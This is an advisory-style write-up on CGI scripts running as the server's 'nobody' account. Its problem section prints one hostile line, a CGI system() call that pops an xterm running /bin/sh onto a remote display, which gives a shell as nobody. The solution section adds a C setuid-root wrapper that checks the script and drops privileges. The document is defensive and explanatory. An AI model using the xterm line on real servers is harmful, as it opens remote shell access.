COMMAND

    /usr/local/X11R6/bin/xterm

SYSTEMS AFFECTED

    X11R6

PROBLEM

    What if we have a CGI script which does the following:

        system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")

    We can now pop an xterm on my display as nobody.  This way any
    user who can install a CGI script gains access to the nobody
    account and can have fun with it...

SOLUTION

    The solution is to run CGI scripts as the user's UID, rather than
    as the server's UID.  Until the most recent beta of Apache, you
    had to do this with "wrapper" programs that are setuid root and
    written carefully.

    You cannot solve the problem by simply removing execute permission
    from "xterm", since  a user can  trivially copy their  own "xterm"
    binary and run that as the server.
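    The following is an added example and is not code from the advisory
    or from Apache: a sketch of the "carefully written" setuid-root
    wrapper mentioned above, in the spirit of suEXEC.  Instead of letting
    the server run a CGI script as its own UID (nobody), the wrapper is
    handed a user name and a script path, refuses to run anything as root
    or a system account, checks that the script really belongs to that
    user and cannot be replaced by others, drops privileges irrevocably,
    and only then execs the script with a minimal environment.  MIN_UID,
    MIN_GID and the reason codes are assumptions chosen for this sketch;
    a production wrapper also restricts which directories scripts may
    live in and checks the ownership of those directories.

```c
/* cgi_wrap.c: sketch of a setuid-root CGI wrapper (added example, not the
 * advisory's or Apache's code).  Build, chown root, chmod 4755, and have
 * the server invoke it as:  cgi_wrap <user> <script>                   */
#define _DEFAULT_SOURCE
#define _BSD_SOURCE
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define MIN_UID 1000   /* assumption: real users start here; refuse root, daemon, nobody... */
#define MIN_GID 100    /* assumption: likewise for groups */

/* Reason codes returned by check_script (assumed names for this sketch). */
enum { WRAP_OK = 0, WRAP_NOT_REGULAR, WRAP_LOW_ID, WRAP_NOT_OWNER,
       WRAP_WRITABLE, WRAP_SETID };

/* Policy check on the script's stat data: may it run as target_uid/gid? */
int check_script(const struct stat *st, uid_t target_uid, gid_t target_gid)
{
    if (!S_ISREG(st->st_mode))                       /* no dirs, devices, fifos */
        return WRAP_NOT_REGULAR;
    if (target_uid < MIN_UID || target_gid < MIN_GID) /* never root or a system account */
        return WRAP_LOW_ID;
    if (st->st_uid != target_uid || st->st_gid != target_gid) /* must be the user's own script */
        return WRAP_NOT_OWNER;
    if (st->st_mode & (S_IWGRP | S_IWOTH))           /* others could swap in their own "xterm" */
        return WRAP_WRITABLE;
    if (st->st_mode & (S_ISUID | S_ISGID))           /* no setid bits on the script itself */
        return WRAP_SETID;
    return WRAP_OK;
}

/* Drop from root to the target identity and confirm the drop stuck. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (setgroups(1, &gid) != 0) return -1;          /* clear supplementary groups first */
    if (setgid(gid) != 0) return -1;                 /* gid before uid, or setgid fails */
    if (setuid(uid) != 0) return -1;
    if (getuid() != uid || geteuid() != uid || getgid() != gid || getegid() != gid)
        return -1;
    if (uid != 0 && setuid(0) == 0) return -1;       /* regaining root means the drop failed */
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s user /path/to/script\n", argv[0]);
        return 1;
    }
    struct passwd *pw = getpwnam(argv[1]);
    if (pw == NULL) { fprintf(stderr, "unknown user %s\n", argv[1]); return 1; }

    struct stat st;
    if (stat(argv[2], &st) != 0) { perror("stat"); return 1; }

    int rc = check_script(&st, pw->pw_uid, pw->pw_gid);
    if (rc != WRAP_OK) { fprintf(stderr, "refusing to run %s (reason %d)\n", argv[2], rc); return 1; }

    if (drop_privileges(pw->pw_uid, pw->pw_gid) != 0) { perror("drop_privileges"); return 1; }

    char *const args[] = { argv[2], NULL };
    char *const env[]  = { "PATH=/usr/bin:/bin", NULL };  /* minimal, fixed environment */
    execve(argv[2], args, env);                            /* only reached on failure */
    perror("execve");
    return 1;
}
```

    Note the order in drop_privileges: supplementary groups and the GID
    are changed before the UID, because once setuid() has succeeded the
    process is no longer root and can no longer change its groups.  With
    this in place, the xterm trick from the PROBLEM section runs as the
    script's owner, not as nobody, so it buys the author nothing they did
    not already have.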

    Another solution is simply not to do it, but try explaining that to the guys :-)